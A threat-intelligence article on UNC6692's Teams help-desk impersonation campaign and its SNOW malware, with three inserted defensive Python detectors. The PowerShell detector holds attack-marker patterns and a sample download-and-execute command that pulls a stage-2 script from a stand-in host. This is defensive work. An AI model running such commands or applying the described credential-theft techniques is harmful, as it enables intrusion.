UNC6692 Poses as IT Help Desk via Microsoft Teams to Deploy SNOW Malware


Security researchers have uncovered a previously unknown threat activity group designated as UNC6692, which has been conducting targeted attacks using social engineering tactics deployed through Microsoft Teams messaging platform. The campaign focuses on distributing a specialized malware toolkit designed to establish persistent access to corporate networks.

According to findings released by Google-owned Mandiant, the threat actors behind UNC6692 have adopted a sophisticated multi-stage approach that combines email-based distraction tactics with impersonation of legitimate IT support personnel to manipulate victims into installing malicious software.

The Multi-Phase Attack Strategy


The attack sequence begins with an intentional barrage of unwanted messages sent to a targeted organization’s email system. This initial flooding phase creates confusion and concern among employees, establishing a psychological foundation for the subsequent social engineering attempt.

Following the email bombardment phase, threat actors reach out to the affected individual through Microsoft Teams. The message purports to originate from the organization’s internal IT department and offers assistance in resolving the email flooding problem. The attackers craft these messages to appear legitimate, complete with professional language and apparent understanding of the technical issue affecting the victim.

This particular combination of techniques—email bombing followed by Teams-based help desk impersonation—represents a continuation of methodologies previously associated with the Black Basta ransomware affiliate network. Despite Black Basta’s shutdown of organized operations in early 2025, the tactical playbook has remained effective and continues to be deployed by multiple threat groups.

Shifting Focus Toward Senior Leadership

Research conducted by ReliaQuest reveals an important evolution in targeting patterns. The same attack methodology has increasingly been directed toward executive-level personnel and senior management within organizations, rather than general employees.

Between March 1 and April 1, 2026, 77% of observed attack attempts specifically targeted senior-level employees—representing a significant increase from the 59% rate documented during the initial two months of 2026. According to ReliaQuest security researchers John Dilgen and Alexa Feminella, this shift demonstrates how effective attack methodologies can remain viable long after the original threat group dissolves.

The attackers leverage these conversations to convince victims to install remote administration tools such as Quick Assist or Supremo Remote Desktop applications. Once installed, these legitimate tools are weaponized by attackers to deliver additional malicious payloads and establish interactive control over the compromised system.

ReliaQuest’s analysis documented cases where initial contact attempts occurred within just 29 seconds of each other, suggesting highly coordinated operations designed to catch victims before they could verify the legitimacy of incoming messages.

Technical Analysis of the Malware Chain


The attack methodology documented by Mandiant researchers reveals a more technically sophisticated variation. Instead of requesting direct installation of remote management tools, victims are directed to click on a fraudulent link embedded within the Teams conversation. The link appears to lead to a legitimate software patch designed to remediate the spam email problem.

When activated, the malicious link initiates the download of an AutoHotkey script sourced from threat-actor-controlled Amazon Web Services (AWS) infrastructure. The phishing interface is deceptively labeled “Mailbox Repair and Sync Utility v2.1.5” to maintain the illusion of legitimacy.

The downloaded script functions as a reconnaissance tool while simultaneously deploying SNOWBELT, a malicious browser extension specifically designed for the Chromium-based Microsoft Edge browser. The installation process launches Edge in hidden mode while employing the “--load-extension” parameter to inject the unauthorized extension.
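The side-loading step described above leaves a distinctive trace in process-creation telemetry: Edge started with a “--load-extension” switch pointing at an unpacked directory, by a parent that is not the normal launch chain. The following Python is an added example written for this article, not Mandiant's or the author's code; it scores records shaped like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage). The field names, the sample paths, the choice of “trusted” parents and the hiding switches it looks for are assumptions made for illustration, since the article only says Edge is started in hidden mode.

```python
"""Flag Microsoft Edge launches that side-load an unpacked extension.

Added example for this article, not Mandiant's or the author's code. It scores
process-creation records shaped like Sysmon Event ID 1 fields (Image,
CommandLine, ParentImage); the field names, sample paths, trusted parents and
the hiding switches checked are assumptions for illustration.
"""
import re

# Chromium accepts the switch only in the --load-extension=<path> form;
# the path may be quoted when it contains spaces.
LOAD_EXT_RE = re.compile(r'--load-extension=(?:"([^"]+)"|(\S+))', re.IGNORECASE)

# Assumption: the parents an ordinary interactive Edge launch has.
TRUSTED_PARENTS = {"explorer.exe", "msedge.exe"}
# Assumption: extension directories under these paths are user-writable
# staging locations rather than a developer's checkout.
USER_WRITABLE_HINTS = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\users\\public\\")
# Assumption: switches a hidden launch may carry on the command line.
HIDE_HINTS = ("--headless", "--window-position=-32000")


def evaluate(event):
    """Return (score, reasons) for one process-creation record."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if not image.endswith("\\msedge.exe"):
        return 0, []
    match = LOAD_EXT_RE.search(cmd)
    if not match:
        return 0, []
    ext_path = (match.group(1) or match.group(2)).lower()
    score = 1
    reasons = [f"edge side-loads unpacked extension from {ext_path}"]
    if any(hint in ext_path for hint in USER_WRITABLE_HINTS):
        score += 1
        reasons.append("extension lives in a user-writable staging path")
    if parent not in TRUSTED_PARENTS:
        score += 1
        reasons.append(f"unexpected parent process {parent}")
    if any(hint in cmd.lower() for hint in HIDE_HINTS):
        score += 1
        reasons.append("window-hiding switch present")
    return score, reasons


def triage(events, threshold=2):
    """Return [(CommandLine, score, reasons)] for records at or above threshold."""
    flagged = []
    for event in events:
        score, reasons = evaluate(event)
        if score >= threshold:
            flagged.append((event["CommandLine"], score, reasons))
    return flagged


# Constructed sample records (not real telemetry). The first mirrors the
# article's description: a script interpreter starts a hidden Edge with a
# side-loaded extension; the second is a developer's ordinary test launch.
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
SAMPLE_EVENTS = [
    {
        "Image": EDGE,
        "CommandLine": f'"{EDGE}" --headless --load-extension="C:\\Users\\jdoe\\AppData\\Local\\Temp\\snow_ext" about:blank',
        "ParentImage": r"C:\Users\jdoe\AppData\Local\Temp\AutoHotkey.exe",
    },
    {
        "Image": EDGE,
        "CommandLine": f'"{EDGE}" --load-extension=C:\\dev\\myext',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    for cmdline, score, reasons in triage(SAMPLE_EVENTS):
        print(score, cmdline)
        for reason in reasons:
            print("  -", reason)
```

The scoring is deliberately additive rather than a single signature: a developer testing an extension from explorer.exe scores 1 and stays below the threshold, while a script interpreter launching a headless Edge from a temp directory scores 4. Extension side-loading is legitimate in development environments, so the parent process and the extension's location carry more weight than the switch itself.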

Mandiant researchers JP Glab, Tufail Ahmed, Josh Kelley, and Muhammad Umair noted that the attackers implemented sophisticated safeguards within the installation script. The gatekeeper script verifies that the target system matches intended parameters before deploying the payload, simultaneously implementing evasion techniques to bypass automated security analysis systems.

The script incorporates browser verification functionality—if the victim system does not have Microsoft Edge installed, the phishing page displays a persistent warning message directing the user to install the required browser.

The SNOW Malware Toolkit Components

The SNOW malware ecosystem represents a modular toolkit where individual components work in coordination to achieve the attacker’s objectives. Each element serves a specialized function within the broader attack infrastructure:

SNOWBELT Component: This JavaScript-based backdoor receives commands through the attacker’s command infrastructure and functions as an intermediary, relaying execution requests to other components within the toolkit. Its primary function involves maintaining persistent access and routing attacker communications.

SNOWGLAZE Component: Operating as a Python-based tunneling utility, SNOWGLAZE establishes secure encrypted communication channels using WebSocket protocol between the compromised internal network and the attacker’s remote infrastructure. This component authenticates the tunnel connection and ensures encrypted data transmission.

SNOWBASIN Component: Functioning as a permanent backdoor application, SNOWBASIN enables remote command execution capabilities using standard Windows command interpreters. The component supports screenshot capture functionality, file upload and download operations, and self-termination features. SNOWBASIN operates as a local HTTP service, typically binding to ports 8000, 8001, or 8002.

The phishing page also includes a configuration panel featuring a conspicuous “Health Check” button. When activated, this button prompts users to provide their email account credentials, ostensibly for authentication verification purposes. In reality, any credentials entered are captured and transmitted to another attacker-controlled AWS storage location for harvesting and analysis.

Post-Compromise Operational Activities

Following successful initial system compromise, UNC6692 operators conduct a series of coordinated post-exploitation activities designed to expand their network footprint and extract valuable organizational data:

Network Reconnaissance and Lateral Movement: Attackers deploy Python-based scanning tools targeting standard Windows network service ports (135, 445, and 3389). These ports typically correspond to essential Windows management services that enable lateral movement across network infrastructure. Using the SNOWGLAZE tunneling system, operators establish PsExec sessions to additional systems and initiate Remote Desktop Protocol connections to backup servers.

Privilege Escalation Techniques: Threat actors leverage locally available administrator accounts to extract LSASS memory—a critical Windows system component containing authentication credentials and session tokens. The attack employs Windows Task Manager as the extraction mechanism, avoiding suspicious command-line activity that might trigger security monitoring.

Credential Reuse and Domain Controller Access: Employing Pass-The-Hash techniques, attackers utilize harvested password hashes from elevated user accounts to authenticate directly to domain controllers without requiring plaintext passwords. This technique enables movement across network security boundaries while minimizing detection risk.

Sensitive Data Extraction: Operators download and execute FTK Imager, a forensic acquisition tool, to capture system snapshots including Active Directory databases—the core authentication and authorization system for Windows environments. Extracted data is written to standard user directories (typically Downloads folder) and subsequently exfiltrated using LimeWire, a cloud-based file sharing platform.
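Two of the post-compromise stages above produce telemetry a defender can check for directly: the Python port scanner fans out from one host to many neighbours on 135, 445 and 3389, and the Task Manager LSASS dump writes an lsass.DMP file. The following Python is an added example written for this article, not Mandiant's or the author's code. It assumes flow records shaped as {ts, src, dst, dport} and file-creation events shaped as {ts, host, image, path} (the shape of Sysmon Event ID 11); the fan-out threshold, the window length and every sample value are constructed assumptions.

```python
"""Two post-compromise checks over constructed telemetry.

Added example for this article, not Mandiant's or the author's code. It
assumes flow records shaped as {ts, src, dst, dport} and file-creation events
shaped as {ts, host, image, path} (like Sysmon Event ID 11); thresholds,
window size and all sample values are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

LATERAL_PORTS = {135, 445, 3389}   # the ports the article says were scanned
FANOUT_THRESHOLD = 10              # assumption: distinct targets that mean "scan"
WINDOW = timedelta(minutes=5)      # assumption: sliding window length


def detect_fanout(flows, threshold=FANOUT_THRESHOLD, window=WINDOW):
    """Return {src: set_of_targets} for sources that reach >= threshold distinct
    hosts on lateral-movement ports within one sliding window."""
    by_src = defaultdict(list)
    for flow in flows:
        if flow["dport"] in LATERAL_PORTS:
            by_src[flow["src"]].append(flow)
    hits = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end, rec in enumerate(recs):
            # advance the window start until it is within `window` of rec
            while rec["ts"] - recs[start]["ts"] > window:
                start += 1
            if len({r["dst"] for r in recs[start:end + 1]}) >= threshold:
                hits[src] = {r["dst"] for r in recs}
                break
    return hits


def detect_lsass_dump(file_events):
    """Flag creation of an lsass*.dmp file, whatever process wrote it.
    Task Manager's 'Create dump file' writes lsass.DMP under %TEMP%, so the
    writer is Taskmgr.exe rather than a tool a scanner would recognise."""
    hits = []
    for event in file_events:
        name = event["path"].rsplit("\\", 1)[-1].lower()
        if name.startswith("lsass") and name.endswith(".dmp"):
            hits.append((event["host"], event["image"], event["path"]))
    return hits


# Constructed samples (not real telemetry).
T0 = datetime(2026, 3, 10, 9, 0, 0)
SAMPLE_FLOWS = (
    # one host touching 12 neighbours on 445 within a few seconds
    [{"ts": T0 + timedelta(seconds=i), "src": "10.0.0.23",
      "dst": f"10.0.1.{i + 1}", "dport": 445} for i in range(12)]
    # a client talking to three file servers over an hour: benign
    + [{"ts": T0 + timedelta(minutes=20 * i), "src": "10.0.0.5",
        "dst": f"10.0.2.{i + 1}", "dport": 445} for i in range(3)]
    # a web crawler on port 80: not a lateral-movement port, ignored
    + [{"ts": T0 + timedelta(seconds=i), "src": "10.0.0.9",
        "dst": f"10.0.3.{i + 1}", "dport": 80} for i in range(20)]
)
SAMPLE_FILE_EVENTS = [
    {"ts": T0, "host": "WS-0412", "image": r"C:\Windows\System32\Taskmgr.exe",
     "path": r"C:\Users\jdoe\AppData\Local\Temp\lsass.DMP"},
    {"ts": T0, "host": "WS-0412", "image": r"C:\Windows\System32\svchost.exe",
     "path": r"C:\Windows\Temp\report.dmp"},
]

if __name__ == "__main__":
    for src, targets in detect_fanout(SAMPLE_FLOWS).items():
        print(f"fan-out from {src}: {len(targets)} hosts on lateral-movement ports")
    for host, image, path in detect_lsass_dump(SAMPLE_FILE_EVENTS):
        print(f"LSASS dump on {host}: {image} wrote {path}")
```

The fan-out check keys on distinct destinations inside a time window rather than on raw connection counts, which is what separates a scanner from a busy but normal client, and the LSASS check keys on the file name rather than the writing process, precisely because the article's point is that Task Manager avoids the command-line patterns most rules look for.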

Strategic Use of Legitimate Infrastructure

A critical element of UNC6692’s operational success involves deliberate abuse of mainstream cloud service providers for multiple attack phases. By hosting malicious components on Amazon Web Services and similar trusted platforms, attackers can circumvent network security filtering systems that typically permit traffic to these well-established services.

Mandiant researchers emphasized this dimension: “A critical element of this strategy is the systematic abuse of legitimate cloud services for payload delivery and exfiltration, and for command-and-control (C2) infrastructure. By hosting malicious components on trusted cloud platforms, attackers can often bypass traditional network reputation filters and blend into the high volume of legitimate cloud traffic.”

This approach creates a significant detection challenge for defensive security teams, as distinguishing between legitimate organizational cloud usage and attacker-controlled infrastructure becomes substantially more difficult.

Parallel Campaigns and Emerging Variants

Additional research from Cato Networks has identified a related campaign utilizing similar help desk impersonation tactics but deploying different malware payloads. This parallel operation uses Microsoft Teams meetings to convince victims to execute a WebSocket-based backdoor dubbed PhantomBackdoor, delivered through obfuscated PowerShell scripts retrieved from external servers.

Cato Networks security researchers noted: “This incident shows how help desk impersonation delivered through a Microsoft Teams meeting can replace traditional phishing and still lead to the same outcome: staged PowerShell execution followed by a WebSocket backdoor.”

The emergence of multiple independent campaigns employing similar social engineering methodologies suggests that the tactics have achieved widespread adoption across the threat actor community, establishing a de facto standard approach for initial compromise.

Microsoft’s Perspective on the Threat Landscape

Microsoft has publicly acknowledged the escalating abuse of its Teams collaboration platform by threat actors. The company has warned that attackers are initiating cross-organizational Teams communications to establish interactive system control through remote management tools including Quick Assist.

Following successful establishment of interactive access, attackers conduct reconnaissance operations and deploy connectivity agents designed to establish encrypted outbound connections to attacker infrastructure. Subsequently, attackers deploy fallback remote access mechanisms using Level RMM to maintain persistence if original artifacts are discovered and neutralized.

The complete operational sequence involves using native Windows administrative protocols, particularly Windows Remote Management (WinRM), to conduct credential-based lateral movement. This approach enables attackers to pivot toward high-value targets including domain controllers and critical infrastructure systems.

Microsoft stated: “This access pathway might be used to perform credential-backed lateral movement using native administrative protocols such as Windows Remote Management (WinRM), allowing threat actors to pivot toward high-value assets including domain controllers.”

Defense and Mitigation Considerations

Cato Networks recommends that defensive security teams implement several critical protective measures:

Organizations should establish formal help desk verification workflows requiring multi-factor authentication for all remote access requests. External collaboration platform communications should be subject to stringent control policies, with screen-sharing capabilities restricted by default. PowerShell execution policies should be enforced to restrict unauthorized script execution, and logging should be enhanced to detect suspicious PowerShell usage patterns.
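The last of those recommendations, detecting suspicious PowerShell usage, depends on looking past the launch switches to what an encoded command actually contains, since the Cato-documented campaign staged its backdoor through obfuscated PowerShell. The following Python is an added example written for this article, not Cato Networks' or the author's code. It assumes process-creation records expose the full command line (Event ID 4688 with command-line auditing, or Sysmon Event ID 1); the pattern list and both sample command lines are constructed for illustration.

```python
"""Triage PowerShell launch command lines, decoding -EncodedCommand payloads.

Added example for this article, not Cato Networks' or the author's code. It
assumes process-creation records expose the full command line (Event ID 4688
with command-line auditing, or Sysmon Event ID 1); the pattern list and the
sample command lines are constructed for illustration.
"""
import base64
import re

# Each pattern is paired with the reason it contributes to a finding.
SUSPICIOUS_PATTERNS = [
    (r"\bIEX\b|Invoke-Expression", "in-memory execution"),
    (r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", "remote fetch"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-nop\b|-noprofile\b", "profile bypass"),
    (r"-ep\s+bypass|-ExecutionPolicy\s+Bypass", "execution policy bypass"),
    (r"ClientWebSocket|Net\.Sockets|WebSocket", "socket or WebSocket use"),
]
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/invalid."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Return (decoded_text_or_None, [reasons]) for one PowerShell command line.
    Patterns are matched against the launch line and the decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons = ["encoded command"] if decoded is not None else []
    reasons += [label for pattern, label in SUSPICIOUS_PATTERNS
                if re.search(pattern, text, re.I)]
    return decoded, reasons


# Constructed samples (not real telemetry). The encoded form is built here from
# plaintext so the example stays readable; in telemetry only the blob appears.
STAGE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')"
ENCODED_BLOB = base64.b64encode(STAGE_TEXT.encode("utf-16-le")).decode("ascii")
SAMPLE_SUSPICIOUS = f"powershell.exe -nop -w hidden -enc {ENCODED_BLOB}"
SAMPLE_BENIGN = r"powershell.exe -ExecutionPolicy AllSigned -File C:\scripts\nightly-backup.ps1"

if __name__ == "__main__":
    for sample in (SAMPLE_SUSPICIOUS, SAMPLE_BENIGN):
        decoded, reasons = triage(sample)
        print(sample[:60], "->", reasons or "clean")
        if decoded:
            print("  decoded:", decoded)
```

Decoding before matching is the point: the download-and-execute stage is invisible on the raw command line, and the hidden-window and no-profile switches alone are common enough in scheduled tasks that they should only raise a finding in combination with what the payload does.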

The campaign demonstrates the effectiveness of combining multiple attack vectors—psychological manipulation through email flooding, impersonation of trusted internal personnel, exploitation of legitimate remote management tools, and abuse of mainstream cloud infrastructure—to achieve comprehensive network compromise.

Evolution of Attack Tactics

The UNC6692 campaign underscores an important evolution in modern cybersecurity threats. Rather than deploying novel malware or zero-day vulnerabilities, threat actors achieve remarkable success by weaponizing legitimate tools, platforms, and user expectations.

The strategy illustrates how attackers can effectively eliminate the security advantage traditionally provided by legitimate software. When threat actors can deliver malicious payloads through trusted platforms and use management tools originally designed for legitimate support functions, organizational defenses must fundamentally adapt.

Security teams are increasingly recognizing that collaboration platforms—Microsoft Teams, Slack, and similar tools—constitute first-class attack surfaces requiring equivalent defensive investment as traditional network perimeter defenses.
